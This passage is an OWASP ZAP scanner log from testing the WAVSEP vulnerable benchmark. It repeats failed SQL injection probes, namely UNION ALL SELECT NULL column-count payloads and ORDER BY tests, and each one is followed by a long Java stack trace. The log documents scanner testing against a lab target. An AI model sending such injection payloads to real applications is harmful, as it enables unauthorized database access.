org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922715 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922716 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922720 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922721 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922722 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922726 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922728 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922729 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922732 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922733 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 5196#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 5196# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922735 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922736 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 